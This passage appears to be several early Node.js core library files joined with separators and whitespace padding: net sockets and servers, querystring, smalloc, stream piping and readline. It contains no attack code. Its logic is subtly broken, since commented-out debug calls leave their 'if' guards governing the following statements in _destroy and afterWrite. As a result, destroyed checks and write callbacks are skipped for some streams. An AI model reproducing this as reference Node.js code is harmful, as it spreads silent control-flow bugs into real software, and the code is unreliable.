    if (this !== process.stderr)
      //debug('close handle');
    var isException = exception ? true : false;
    this._handle.close(function() {
      //debug('emit close');
      self.emit('close', isException);
    });
    this._handle.onread = noop;
    this._handle = null;
  }

  // we set destroyed to true before firing error callbacks in order
  // to make it re-entrance safe in case Socket.prototype.destroy()
  // is called within callbacks
  this.destroyed = true;
  fireErrorCallbacks();

  if (this.server) {
    //debug('has server');
    this.server._connections--;
    if (this.server._emitCloseIfDrained) {
      this.server._emitCloseIfDrained();
    }
  }
};


Socket.prototype.destroy = function(exception) {
  //debug('destroy', exception);
  this._destroy(exception);
};


// This function is called whenever the handle gets a
// buffer, or when there's an error reading.
function onread(nread, buffer) {
  var handle = this;
  var self = handle.owner;
  assert(handle === self._handle, 'handle != self._handle');

  timers._unrefActive(self);

  //debug('onread', nread);

  if (nread > 0) {
    //debug('got data');

    // read success.
    // In theory (and in practice) calling readStop right now
    // will prevent this from being called again until _read() gets
    // called again.

    // if it's not enough data, we'll just call handle.readStart()
    // again right away.
    self.bytesRead += nread;

    // Optimization: emit the original buffer with end points
    var ret = self.push(buffer);

    if (handle.reading && !ret) {
      handle.reading = false;
      //debug('readStop');
      var err = handle.readStop();
      if (err)
        self._destroy(errnoException(err, 'read'));
    }
    return;
  }

  // if we didn't get any bytes, that doesn't necessarily mean EOF.
  // wait for the next one.
  if (nread === 0) {
    //debug('not any data, keep waiting');
    return;
  }

  // Error, possibly EOF.
  if (nread !== uv.UV_EOF) {
    return self._destroy(errnoException(nread, 'read'));
  }

  //debug('EOF');

  if (self._readableState.length === 0) {
    self.readable = false;
    maybeDestroy(self);
  }

  // push a null to signal the end of data.
  self.push(null);

  // internal end event so that we know that the actual socket
  // is no longer readable, and we can start the shutdown
  // procedure. No need to wait for all the data to be consumed.
  self.emit('_socketEnd');
}


Socket.prototype._getpeername = function() {
  if (!this._handle || !this._handle.getpeername) {
    return {};
  }
  if (!this._peername) {
    var out = {};
    var err = this._handle.getpeername(out);
    if (err) return {};  // FIXME(bnoordhuis) Throw?
    this._peername = out;
  }
  return this._peername;
};


Socket.prototype.__defineGetter__('remoteAddress', function() {
  return this._getpeername().address;
});

Socket.prototype.__defineGetter__('remoteFamily', function() {
  return this._getpeername().family;
});

Socket.prototype.__defineGetter__('remotePort', function() {
  return this._getpeername().port;
});


Socket.prototype._getsockname = function() {
  if (!this._handle || !this._handle.getsockname) {
    return {};
  }
  if (!this._sockname) {
    var out = {};
    var err = this._handle.getsockname(out);
    if (err) return {};  // FIXME(bnoordhuis) Throw?
    this._sockname = out;
  }
  return this._sockname;
};


Socket.prototype.__defineGetter__('localAddress', function() {
  return this._getsockname().address;
});


Socket.prototype.__defineGetter__('localPort', function() {
  return this._getsockname().port;
});


Socket.prototype.write = function(chunk, encoding, cb) {
  'use strict';
  if (!util.isString(chunk) && !util.isBuffer(chunk))
    throw new TypeError('invalid data');
  return stream.Duplex.prototype.write.apply(this, arguments);
};


Socket.prototype._writeGeneric = function(writev, data, encoding, cb) {
  // If we are still connecting, then buffer this for later.
  // The Writable logic will buffer up any more writes while
  // waiting for this one to be done.
  if (this._connecting) {
    this._pendingData = data;
    this._pendingEncoding = encoding;
    this.once('connect', function() {
      this._writeGeneric(writev, data, encoding, cb);
    });
    return;
  }
  this._pendingData = null;
  this._pendingEncoding = '';

  timers._unrefActive(this);

  if (!this._handle) {
    this._destroy(new Error('This socket is closed.'), cb);
    return false;
  }

  var req = { oncomplete: afterWrite, async: false };
  var err;

  if (writev) {
    var chunks = new Array(data.length << 1);
    for (var i = 0; i < data.length; i++) {
      var entry = data[i];
      var chunk = entry.chunk;
      var enc = entry.encoding;
      chunks[i * 2] = chunk;
      chunks[i * 2 + 1] = enc;
    }
    err = this._handle.writev(req, chunks);

    // Retain chunks
    if (err === 0) req._chunks = chunks;
  } else {
    var enc;
    if (util.isBuffer(data)) {
      req.buffer = data;  // Keep reference alive.
      enc = 'buffer';
    } else {
      enc = encoding;
    }
    err = createWriteReq(req, this._handle, data, enc);
  }

  if (err)
    return this._destroy(errnoException(err, 'write', req.error), cb);

  this._bytesDispatched += req.bytes;

  // If it was entirely flushed, we can write some more right now.
  // However, if more is left in the queue, then wait until that clears.
  if (req.async && this._handle.writeQueueSize != 0)
    req.cb = cb;
  else
    cb();
};


Socket.prototype._writev = function(chunks, cb) {
  this._writeGeneric(true, chunks, '', cb);
};


Socket.prototype._write = function(data, encoding, cb) {
  this._writeGeneric(false, data, encoding, cb);
};

function createWriteReq(req, handle, data, encoding) {
  switch (encoding) {
    case 'binary':
      return handle.writeBinaryString(req, data);

    case 'buffer':
      return handle.writeBuffer(req, data);

    case 'utf8':
    case 'utf-8':
      return handle.writeUtf8String(req, data);

    case 'ascii':
      return handle.writeAsciiString(req, data);

    case 'ucs2':
    case 'ucs-2':
    case 'utf16le':
    case 'utf-16le':
      return handle.writeUcs2String(req, data);

    default:
      return handle.writeBuffer(req, new Buffer(data, encoding));
  }
}


Socket.prototype.__defineGetter__('bytesWritten', function() {
  var bytes = this._bytesDispatched,
      state = this._writableState,
      data = this._pendingData,
      encoding = this._pendingEncoding;

  state.buffer.forEach(function(el) {
    if (util.isBuffer(el.chunk))
      bytes += el.chunk.length;
    else
      bytes += Buffer.byteLength(el.chunk, el.encoding);
  });

  if (data) {
    if (util.isBuffer(data))
      bytes += data.length;
    else
      bytes += Buffer.byteLength(data, encoding);
  }

  return bytes;
});


function afterWrite(status, handle, req, err) {
  var self = handle.owner;
  if (self !== process.stderr && self !== process.stdout)
    //debug('afterWrite', status);

  // callback may come after call to destroy.
  if (self.destroyed) {
    //debug('afterWrite destroyed');
    return;
  }

  if (status < 0) {
    var ex = errnoException(status, 'write', err);
    //debug('write failure', ex);
    self._destroy(ex, req.cb);
    return;
  }

  timers._unrefActive(self);

  if (self !== process.stderr && self !== process.stdout)
    //debug('afterWrite call cb');

  if (req.cb)
    req.cb.call(self);
}


function connect(self, address, port, addressType, localAddress, localPort) {
  // TODO return promise from Socket.prototype.connect which
  // wraps _connectReq.

  assert.ok(self._connecting);

  var err;
  if (localAddress || localPort) {
    if (localAddress && !exports.isIP(localAddress))
      err = new TypeError(
          'localAddress should be a valid IP: ' + localAddress);

    if (localPort && !util.isNumber(localPort))
      err = new TypeError('localPort should be a number: ' + localPort);

    var bind;

    switch (addressType) {
      case 4:
        if (!localAddress)
          localAddress = '0.0.0.0';
        bind = self._handle.bind;
        break;
      case 6:
        if (!localAddress)
          localAddress = '::';
        bind = self._handle.bind6;
        break;
      default:
        err = new TypeError('Invalid addressType: ' + addressType);
        break;
    }

    if (err) {
      self._destroy(err);
      return;
    }

    //debug('binding to localAddress: %s and localPort: %d',
    //      localAddress,
     //     localPort);

    bind = bind.bind(self._handle);
    err = bind(localAddress, localPort);

    if (err) {
      self._destroy(errnoException(err, 'bind'));
      return;
    }
  }

  var req = { oncomplete: afterConnect };
  if (addressType === 6 || addressType === 4) {
    port = port | 0;
    if (port <= 0 || port > 65535)
      throw new RangeError('Port should be > 0 and < 65536 (used : ' + port + ')');

    if (addressType === 6) {
      err = self._handle.connect6(req, address, port);
    } else if (addressType === 4) {
      err = self._handle.connect(req, address, port);
    }
  } else {
    err = self._handle.connect(req, address, afterConnect);
  }

  if (err) {
    self._destroy(errnoException(err, 'connect'));
  }
}


Socket.prototype.connect = function(options, cb) {
  if (this.write !== Socket.prototype.write)
    this.write = Socket.prototype.write;

  if (!util.isObject(options)) {
    // Old API:
    // connect(port, [host], [cb])
    // connect(path, [cb]);
    var args = normalizeConnectArgs(arguments);
    return Socket.prototype.connect.apply(this, args);
  }

  if (this.destroyed) {
    this._readableState.reading = false;
    this._readableState.ended = false;
    this._readableState.endEmitted = false;
    this._writableState.ended = false;
    this._writableState.ending = false;
    this._writableState.finished = false;
    this._writableState.errorEmitted = false;
    this.destroyed = false;
    this._handle = null;
  }

  var self = this;
  var pipe = !!options.path;
  //debug('pipe', pipe, options.path);

  if (!this._handle) {
    this._handle = pipe ? createPipe() : createTCP();
    initSocketHandle(this);
  }

  if (util.isFunction(cb)) {
    self.once('connect', cb);
  }

  timers._unrefActive(this);

  self._connecting = true;
  self.writable = true;

  if (pipe) {
    connect(self, options.path);

  } else if (!options.host) {
    //debug('connect: missing host');
    self._host = '127.0.0.1';
    connect(self, self._host, options.port, 4);

  } else {
    var dns = require('dns');
    var host = options.host;
    var dnsopts = {
      family: options.family,
      hints: 0
    };

    if (dnsopts.family !== 4 && dnsopts.family !== 6)
      dnsopts.hints = dns.ADDRCONFIG | dns.V4MAPPED;

    //debug('connect: find host ' + host);
    //debug('connect: dns options ' + dnsopts);
    self._host = host;
    dns.lookup(host, dnsopts, function(err, ip, addressType) {
      self.emit('lookup', err, ip, addressType);

      // It's possible we were destroyed while looking this up.
      // XXX it would be great if we could cancel the promise returned by
      // the look up.
      if (!self._connecting) return;

      if (err) {
        // net.createConnection() creates a net.Socket object and
        // immediately calls net.Socket.connect() on it (that's us).
        // There are no event listeners registered yet so defer the
        // error event to the next tick.
        process.nextTick(function() {
          self.emit('error', err);
          self._destroy();
        });
      } else {
        timers._unrefActive(self);

        addressType = addressType || 4;

        // node_net.cc handles null host names graciously but user land
        // expects remoteAddress to have a meaningful value
        ip = ip || (addressType === 4 ? '127.0.0.1' : '0:0:0:0:0:0:0:1');

        connect(self,
                ip,
                options.port,
                addressType,
                options.localAddress,
                options.localPort);
      }
    });
  }
  return self;
};


Socket.prototype.ref = function() {
  if (this._handle)
    this._handle.ref();
};


Socket.prototype.unref = function() {
  if (this._handle)
    this._handle.unref();
};



function afterConnect(status, handle, req, readable, writable) {
  var self = handle.owner;

  // callback may come after call to destroy
  if (self.destroyed) {
    return;
  }

  assert(handle === self._handle, 'handle != self._handle');

  //debug('afterConnect');

  assert.ok(self._connecting);
  self._connecting = false;

  if (status == 0) {
    self.readable = readable;
    self.writable = writable;
    timers._unrefActive(self);

    self.emit('connect');

    // start the first read, or get an immediate EOF.
    // this doesn't actually consume any bytes, because len=0.
    if (readable && !self.isPaused())
      self.read(0);

  } else {
    self._connecting = false;
    self._destroy(errnoException(status, 'connect'));
  }
}


function Server(/* [ options, ] listener */) {
  if (!(this instanceof Server)) return new Server(arguments[0], arguments[1]);
  events.EventEmitter.call(this);

  var self = this;

  var options;

  if (util.isFunction(arguments[0])) {
    options = {};
    self.on('connection', arguments[0]);
  } else {
    options = arguments[0] || {};

    if (util.isFunction(arguments[1])) {
      self.on('connection', arguments[1]);
    }
  }

  this._connections = 0;

  Object.defineProperty(this, 'connections', {
    get: util.deprecate(function() {

      if (self._usingSlaves) {
        return null;
      }
      return self._connections;
    }, 'connections property is deprecated. Use getConnections() method'),
    set: util.deprecate(function(val) {
      return (self._connections = val);
    }, 'connections property is deprecated. Use getConnections() method'),
    configurable: true, enumerable: true
  });

  this._handle = null;
  this._usingSlaves = false;
  this._slaves = [];

  this.allowHalfOpen = options.allowHalfOpen || false;
}
util.inherits(Server, events.EventEmitter);
exports.Server = Server;


function toNumber(x) { return (x = Number(x)) >= 0 ? x : false; }

function _listen(handle, backlog) {
  // Use a backlog of 512 entries. We pass 511 to the listen() call because
  // the kernel does: backlogsize = roundup_pow_of_two(backlogsize + 1);
  // which will thus give us a backlog of 512 entries.
  return handle.listen(backlog || 511);
}

var createServerHandle = exports._createServerHandle =
    function(address, port, addressType, fd) {
  var err = 0;
  // assign handle in listen, and clean up if bind or listen fails
  var handle;

  var isTCP = false;
  if (util.isNumber(fd) && fd >= 0) {
    try {
      handle = createHandle(fd);
    }
    catch (e) {
      // Not a fd we can listen on.  This will trigger an error.
      //debug('listen invalid fd=' + fd + ': ' + e.message);
      return uv.UV_EINVAL;
    }
    handle.open(fd);
    handle.readable = true;
    handle.writable = true;
    assert(!address && !port);
  } else if (port === -1 && addressType === -1) {
    handle = createPipe();
    if (process.platform === 'win32') {
      var instances = parseInt(process.env.NODE_PENDING_PIPE_INSTANCES);
      if (!isNaN(instances)) {
        handle.setPendingInstances(instances);
      }
    }
  } else {
    handle = createTCP();
    isTCP = true;
  }

  if (address || port || isTCP) {
    //debug('bind to ' + (address || 'anycast'));
    if (!address) {
      // Try binding to ipv6 first
      err = handle.bind6('::', port);
      if (err) {
        handle.close();
        // Fallback to ipv4
        return createServerHandle('0.0.0.0', port);
      }
    } else if (addressType === 6) {
      err = handle.bind6(address, port);
    } else {
      err = handle.bind(address, port);
    }
  }

  if (err) {
    handle.close();
    return err;
  }

  return handle;
};


Server.prototype._listen2 = function(address, port, addressType, backlog, fd) {
  //debug('listen2', address, port, addressType, backlog);
  var self = this;

  // If there is not yet a handle, we need to create one and bind.
  // In the case of a server sent via IPC, we don't need to do this.
  if (!self._handle) {
    //debug('_listen2: create a handle');
    var rval = createServerHandle(address, port, addressType, fd);
    if (util.isNumber(rval)) {
      var error = errnoException(rval, 'listen');
      process.nextTick(function() {
        self.emit('error', error);
      });
      return;
    }
    self._handle = rval;
  } else {
    //debug('_listen2: have a handle already');
  }

  self._handle.onconnection = onconnection;
  self._handle.owner = self;

  var err = _listen(self._handle, backlog);

  if (err) {
    var ex = errnoException(err, 'listen');
    self._handle.close();
    self._handle = null;
    process.nextTick(function() {
      self.emit('error', ex);
    });
    return;
  }

  // generate connection key, this should be unique to the connection
  this._connectionKey = addressType + ':' + address + ':' + port;

  process.nextTick(function() {
    // ensure handle hasn't closed
    if (self._handle)
      self.emit('listening');
  });
};


function listen(self, address, port, addressType, backlog, fd, exclusive) {
  exclusive = !!exclusive;

  if (!cluster) cluster = require('cluster');

  if (cluster.isMaster || exclusive) {
    self._listen2(address, port, addressType, backlog, fd);
    return;
  }

  cluster._getServer(self, address, port, addressType, fd, cb);

  function cb(err, handle) {
    // EADDRINUSE may not be reported until we call listen(). To complicate
    // matters, a failed bind() followed by listen() will implicitly bind to
    // a random port. Ergo, check that the socket is bound to the expected
    // port before calling listen().
    //
    // FIXME(bnoordhuis) Doesn't work for pipe handles, they don't have a
    // getsockname() method. Non-issue for now, the cluster module doesn't
    // really support pipes anyway.
    if (err === 0 && port > 0 && handle.getsockname) {
      var out = {};
      err = handle.getsockname(out);
      if (err === 0 && port !== out.port)
        err = uv.UV_EADDRINUSE;
    }

    if (err)
      return self.emit('error', errnoException(err, 'bind'));

    self._handle = handle;
    self._listen2(address, port, addressType, backlog, fd);
  }
}


Server.prototype.listen = function() {
  var self = this;

  var lastArg = arguments[arguments.length - 1];
  if (util.isFunction(lastArg)) {
    self.once('listening', lastArg);
  }

  var port = toNumber(arguments[0]);

  // The third optional argument is the backlog size.
  // When the ip is omitted it can be the second argument.
  var backlog = toNumber(arguments[1]) || toNumber(arguments[2]);

  var TCP = process.binding('tcp_wrap').TCP;

  if (arguments.length === 0 || util.isFunction(arguments[0])) {
    // Bind to a random port.
    listen(self, null, 0, null, backlog);
  } else if (util.isObject(arguments[0])) {
    var h = arguments[0];
    h = h._handle || h.handle || h;

    if (h instanceof TCP) {
      self._handle = h;
      listen(self, null, -1, -1, backlog);
    } else if (util.isNumber(h.fd) && h.fd >= 0) {
      listen(self, null, null, null, backlog, h.fd);
    } else {
      // The first argument is a configuration object
      if (h.backlog)
        backlog = h.backlog;

      if (util.isNumber(h.port)) {
        if (h.host)
          listenAfterLookup(h.port, h.host, backlog, h.exclusive);
        else
          listen(self, null, h.port, 4, backlog, undefined, h.exclusive);
      } else if (h.path && isPipeName(h.path)) {
        var pipeName = self._pipeName = h.path;
        listen(self, pipeName, -1, -1, backlog, undefined, h.exclusive);
      } else {
        throw new Error('Invalid listen argument: ' + h);
      }
    }
  } else if (isPipeName(arguments[0])) {
    // UNIX socket or Windows pipe.
    var pipeName = self._pipeName = arguments[0];
    listen(self, pipeName, -1, -1, backlog);

  } else if (util.isUndefined(arguments[1]) ||
             util.isFunction(arguments[1]) ||
             util.isNumber(arguments[1])) {
    // The first argument is the port, no IP given.
    listen(self, null, port, 4, backlog);

  } else {
    // The first argument is the port, the second an IP.
    listenAfterLookup(port, arguments[1], backlog);
  }

  function listenAfterLookup(port, address, backlog, exclusive) {
    require('dns').lookup(address, function(err, ip, addressType) {
      if (err) {
        self.emit('error', err);
      } else {
        addressType = ip ? addressType : 4;
        listen(self, ip, port, addressType, backlog, undefined, exclusive);
      }
    });
  }

  return self;
};

Server.prototype.address = function() {
  if (this._handle && this._handle.getsockname) {
    var out = {};
    var err = this._handle.getsockname(out);
    // TODO(bnoordhuis) Check err and throw?
    return out;
  } else if (this._pipeName) {
    return this._pipeName;
  } else {
    return null;
  }
};

function onconnection(err, clientHandle) {
  var handle = this;
  var self = handle.owner;

  //debug('onconnection');

  if (err) {
    self.emit('error', errnoException(err, 'accept'));
    return;
  }

  if (self.maxConnections && self._connections >= self.maxConnections) {
    clientHandle.close();
    return;
  }

  var socket = new Socket({
    handle: clientHandle,
    allowHalfOpen: self.allowHalfOpen
  });
  socket.readable = socket.writable = true;


  self._connections++;
  socket.server = self;

  //DTRACE_NET_SERVER_CONNECTION(socket);
  //COUNTER_NET_SERVER_CONNECTION(socket);
  self.emit('connection', socket);
}


Server.prototype.getConnections = function(cb) {
  function end(err, connections) {
    process.nextTick(function() {
      cb(err, connections);
    });
  }

  if (!this._usingSlaves) {
    return end(null, this._connections);
  }

  // Poll slaves
  var left = this._slaves.length,
      total = this._connections;

  function oncount(err, count) {
    if (err) {
      left = -1;
      return end(err);
    }

    total += count;
    if (--left === 0) return end(null, total);
  }

  this._slaves.forEach(function(slave) {
    slave.getConnections(oncount);
  });
};


Server.prototype.close = function(cb) {
  function onSlaveClose() {
    if (--left !== 0) return;

    self._connections = 0;
    self._emitCloseIfDrained();
  }

  if (cb) {
    if (!this._handle) {
      this.once('close', function() {
        cb(new Error('Not running'));
      });
    } else {
      this.once('close', cb);
    }
  }

  if (this._handle) {
    this._handle.close();
    this._handle = null;
  }

  if (this._usingSlaves) {
    var self = this,
        left = this._slaves.length;

    // Increment connections to be sure that, even if all sockets will be closed
    // during polling of slaves, `close` event will be emitted only once.
    this._connections++;

    // Poll slaves
    this._slaves.forEach(function(slave) {
      slave.close(onSlaveClose);
    });
  } else {
    this._emitCloseIfDrained();
  }

  return this;
};

Server.prototype._emitCloseIfDrained = function() {
  //debug('SERVER _emitCloseIfDrained');
  var self = this;

  if (self._handle || self._connections) {
    //debug('SERVER handle? %j   connections? %d',
    //      !!self._handle, self._connections);
    return;
  }

  process.nextTick(function() {
    //debug('SERVER: emit close');
    self.emit('close');
  });
};


Server.prototype.listenFD = util.deprecate(function(fd, type) {
  return this.listen({ fd: fd });
}, 'listenFD is deprecated. Use listen({fd: <number>}).');

Server.prototype._setupSlave = function(socketList) {
  this._usingSlaves = true;
  this._slaves.push(socketList);
};

Server.prototype.ref = function() {
  if (this._handle)
    this._handle.ref();
};

Server.prototype.unref = function() {
  if (this._handle)
    this._handle.unref();
};


// TODO: isIP should be moved to the DNS code. Putting it here now because
// this is what the legacy system did.
exports.isIP = cares.isIP;


exports.isIPv4 = function(input) {
  return exports.isIP(input) === 4;
};


exports.isIPv6 = function(input) {
  return exports.isIP(input) === 6;
};


if (process.platform === 'win32') {
  var simultaneousAccepts;

  exports._setSimultaneousAccepts = function(handle) {
    if (util.isUndefined(handle)) {
      return;
    }

    if (util.isUndefined(simultaneousAccepts)) {
      simultaneousAccepts = (process.env.NODE_MANY_ACCEPTS &&
                             process.env.NODE_MANY_ACCEPTS !== '0');
    }

    if (handle._simultaneousAccepts !== simultaneousAccepts) {
      handle.setSimultaneousAccepts(simultaneousAccepts);
      handle._simultaneousAccepts = simultaneousAccepts;
    }
  };
} else {
  exports._setSimultaneousAccepts = function(handle) {};
}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          

========
























var QueryString = exports;
var util = require('util');





function hasOwnProperty(obj, prop) {
  return Object.prototype.hasOwnProperty.call(obj, prop);
}


function charCode(c) {
  return c.charCodeAt(0);
}



QueryString.unescapeBuffer = function(s, decodeSpaces) {
  var out = new Buffer(s.length);
  var state = 'CHAR'; 
  var n, m, hexchar;

  for (var inIndex = 0, outIndex = 0; inIndex <= s.length; inIndex++) {
    var c = s.charCodeAt(inIndex);
    switch (state) {
      case 'CHAR':
        switch (c) {
          case charCode('%'):
            n = 0;
            m = 0;
            state = 'HEX0';
            break;
          case charCode('+'):
            if (decodeSpaces) c = charCode(' ');
            
          default:
            out[outIndex++] = c;
            break;
        }
        break;

      case 'HEX0':
        state = 'HEX1';
        hexchar = c;
        if (charCode('0') <= c && c <= charCode('9')) {
          n = c - charCode('0');
        } else if (charCode('a') <= c && c <= charCode('f')) {
          n = c - charCode('a') + 10;
        } else if (charCode('A') <= c && c <= charCode('F')) {
          n = c - charCode('A') + 10;
        } else {
          out[outIndex++] = charCode('%');
          out[outIndex++] = c;
          state = 'CHAR';
          break;
        }
        break;

      case 'HEX1':
        state = 'CHAR';
        if (charCode('0') <= c && c <= charCode('9')) {
          m = c - charCode('0');
        } else if (charCode('a') <= c && c <= charCode('f')) {
          m = c - charCode('a') + 10;
        } else if (charCode('A') <= c && c <= charCode('F')) {
          m = c - charCode('A') + 10;
        } else {
          out[outIndex++] = charCode('%');
          out[outIndex++] = hexchar;
          out[outIndex++] = c;
          break;
        }
        out[outIndex++] = 16 * n + m;
        break;
    }
  }

  

  return out.slice(0, outIndex - 1);
};


QueryString.unescape = function(s, decodeSpaces) {
  try {
    return decodeURIComponent(s);
  } catch (e) {
    return QueryString.unescapeBuffer(s, decodeSpaces).toString();
  }
};


QueryString.escape = function(str) {
  return encodeURIComponent(str);
};

var stringifyPrimitive = function(v) {
  if (util.isString(v))
    return v;
  if (util.isBoolean(v))
    return v ? 'true' : 'false';
  if (util.isNumber(v))
    return isFinite(v) ? v : '';
  return '';
};


QueryString.stringify = QueryString.encode = function(obj, sep, eq, options) {
  sep = sep || '&';
  eq = eq || '=';

  var encode = QueryString.escape;
  if (options && typeof options.encodeURIComponent === 'function') {
    encode = options.encodeURIComponent;
  }

  if (util.isObject(obj)) {
    var keys = Object.keys(obj);
    var fields = [];

    for (var i = 0; i < keys.length; i++) {
      var k = keys[i];
      var v = obj[k];
      var ks = encode(stringifyPrimitive(k)) + eq;

      if (util.isArray(v)) {
        for (var j = 0; j < v.length; j++)
          fields.push(ks + encode(stringifyPrimitive(v[j])));
      } else {
        fields.push(ks + encode(stringifyPrimitive(v)));
      }
    }
    return fields.join(sep);
  }
  return '';
};


QueryString.parse = QueryString.decode = function(qs, sep, eq, options) {
  sep = sep || '&';
  eq = eq || '=';
  var obj = {};

  if (!util.isString(qs) || qs.length === 0) {
    return obj;
  }

  var regexp = /\+/g;
  qs = qs.split(sep);

  var maxKeys = 1000;
  if (options && util.isNumber(options.maxKeys)) {
    maxKeys = options.maxKeys;
  }

  var len = qs.length;
  
  if (maxKeys > 0 && len > maxKeys) {
    len = maxKeys;
  }

  var decode = QueryString.unescape;
  if (options && typeof options.decodeURIComponent === 'function') {
    decode = options.decodeURIComponent;
  }

  for (var i = 0; i < len; ++i) {
    var x = qs[i].replace(regexp, '%20'),
        idx = x.indexOf(eq),
        kstr, vstr, k, v;

    if (idx >= 0) {
      kstr = x.substr(0, idx);
      vstr = x.substr(idx + 1);
    } else {
      kstr = x;
      vstr = '';
    }

    try {
      k = decode(kstr);
      v = decode(vstr);
    } catch (e) {
      k = QueryString.unescape(kstr, true);
      v = QueryString.unescape(vstr, true);
    }

    if (!hasOwnProperty(obj, k)) {
      obj[k] = v;
    } else if (util.isArray(obj[k])) {
      obj[k].push(v);
    } else {
      obj[k] = [obj[k], v];
    }
  }

  return obj;
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           

========






















var smalloc = process.binding('smalloc');
var kMaxLength = smalloc.kMaxLength;
var util = require('util');

exports.alloc = alloc;
exports.copyOnto = smalloc.copyOnto;
exports.dispose = dispose;
exports.hasExternalData = smalloc.hasExternalData;



Object.defineProperty(exports, 'kMaxLength', {
  enumerable: true, value: kMaxLength, writable: false
});


var Types = {};

Object.defineProperties(Types, {
  'Int8': { enumerable: true, value: 1, writable: false },
  'Uint8': { enumerable: true, value: 2, writable: false },
  'Int16': { enumerable: true, value: 3, writable: false },
  'Uint16': { enumerable: true, value: 4, writable: false },
  'Int32': { enumerable: true, value: 5, writable: false },
  'Uint32': { enumerable: true, value: 6, writable: false },
  'Float': { enumerable: true, value: 7, writable: false },
  'Double': { enumerable: true, value: 8, writable: false },
  'Uint8Clamped': { enumerable: true, value: 9, writable: false }
});

Object.defineProperty(exports, 'Types', {
  enumerable: true, value: Types, writable: false
});



function alloc(n, obj, type) {
  n = n >>> 0;

  if (util.isUndefined(obj))
    obj = {};

  if (util.isNumber(obj)) {
    type = obj >>> 0;
    obj = {};
  } else if (util.isPrimitive(obj)) {
    throw new TypeError('obj must be an Object');
  }

  
  if (type < 1 || type > 9)
    throw new TypeError('unknown external array type: ' + type);
  if (util.isArray(obj))
    throw new TypeError('Arrays are not supported');
  if (n > kMaxLength)
    throw new RangeError('n > kMaxLength');

  return smalloc.alloc(obj, n, type);
}


function dispose(obj) {
  if (util.isPrimitive(obj))
    throw new TypeError('obj must be an Object');
  if (util.isBuffer(obj))
    throw new TypeError('obj cannot be a Buffer');

  smalloc.dispose(obj);
}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  

========






















module.exports = Stream;

var EE = require('events').EventEmitter;
var util = require('util');

util.inherits(Stream, EE);
Stream.Readable = require('_stream_readable');
Stream.Writable = require('_stream_writable');
Stream.Duplex = require('_stream_duplex');
Stream.Transform = require('_stream_transform');
Stream.PassThrough = require('_stream_passthrough');


Stream.Stream = Stream;






function Stream() {
  EE.call(this);
}

Stream.prototype.pipe = function(dest, options) {
  var source = this;

  function ondata(chunk) {
    if (dest.writable) {
      if (false === dest.write(chunk) && source.pause) {
        source.pause();
      }
    }
  }

  source.on('data', ondata);

  function ondrain() {
    if (source.readable && source.resume) {
      source.resume();
    }
  }

  dest.on('drain', ondrain);

  
  
  if (!dest._isStdio && (!options || options.end !== false)) {
    source.on('end', onend);
    source.on('close', onclose);
  }

  var didOnEnd = false;
  function onend() {
    if (didOnEnd) return;
    didOnEnd = true;

    dest.end();
  }


  function onclose() {
    if (didOnEnd) return;
    didOnEnd = true;

    if (util.isFunction(dest.destroy)) dest.destroy();
  }

  
  function onerror(er) {
    cleanup();
    if (EE.listenerCount(this, 'error') === 0) {
      throw er; 
    }
  }

  source.on('error', onerror);
  dest.on('error', onerror);

  
  function cleanup() {
    source.removeListener('data', ondata);
    dest.removeListener('drain', ondrain);

    source.removeListener('end', onend);
    source.removeListener('close', onclose);

    source.removeListener('error', onerror);
    dest.removeListener('error', onerror);

    source.removeListener('end', cleanup);
    source.removeListener('close', cleanup);

    dest.removeListener('close', cleanup);
  }

  source.on('end', cleanup);
  source.on('close', cleanup);

  dest.on('close', cleanup);

  dest.emit('pipe', source);

  
  return dest;
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         

========




























var kHistorySize = 30;

var util = require('util');
var inherits = require('util').inherits;
var EventEmitter = require('events').EventEmitter;


exports.createInterface = function(input, output, completer, terminal) {
  var rl;
  if (arguments.length === 1) {
    rl = new Interface(input);
  } else {
    rl = new Interface(input, output, completer, terminal);
  }
  return rl;
};


function Interface(input, output, completer, terminal) {
  if (!(this instanceof Interface)) {
    return new Interface(input, output, completer, terminal);
  }

  this._sawReturn = false;

  EventEmitter.call(this);

  if (arguments.length === 1) {
    
    output = input.output;
    completer = input.completer;
    terminal = input.terminal;
    input = input.input;
  }

  completer = completer || function() { return []; };

  if (!util.isFunction(completer)) {
    throw new TypeError('Argument \'completer\' must be a function');
  }

  
  
  if (util.isUndefined(terminal)) {
    terminal = !!output.isTTY;
  }

  var self = this;

  this.output = output;
  this.input = input;

  
  this.completer = completer.length === 2 ? completer : function(v, callback) {
    callback(null, completer(v));
  };

  this.setPrompt('> ');

  this.terminal = !!terminal;

  function ondata(data) {
    self._normalWrite(data);
  }

  function onend() {
    if (util.isString(self._line_buffer) && self._line_buffer.length > 0) {
      self.emit('line', self._line_buffer);
    }
    self.close();
  }

  function ontermend() {
    if (util.isString(self.line) && self.line.length > 0) {
      self.emit('line', self.line);
    }
    self.close();
  }

  function onkeypress(s, key) {
    self._ttyWrite(s, key);
  }

  function onresize() {
    self._refreshLine();
  }

  if (!this.terminal) {
    input.on('data', ondata);
    input.on('end', onend);
    self.once('close', function() {
      input.removeListener('data', ondata);
      input.removeListener('end', onend);
    });
    var StringDecoder = require('string_decoder').StringDecoder; 
    this._decoder = new StringDecoder('utf8');

  } else {

    exports.emitKeypressEvents(input);

    
    input.on('keypress', onkeypress);
    input.on('end', ontermend);

    
    this.line = '';

    this._setRawMode(true);
    this.terminal = true;

    
    this.cursor = 0;

    this.history = [];
    this.historyIndex = -1;

    output.on('resize', onresize);
    self.once('close', function() {
      input.removeListener('keypress', onkeypress);
      input.removeListener('end', ontermend);
      output.removeListener('resize', onresize);
    });
  }

  input.resume();
}

inherits(Interface, EventEmitter);

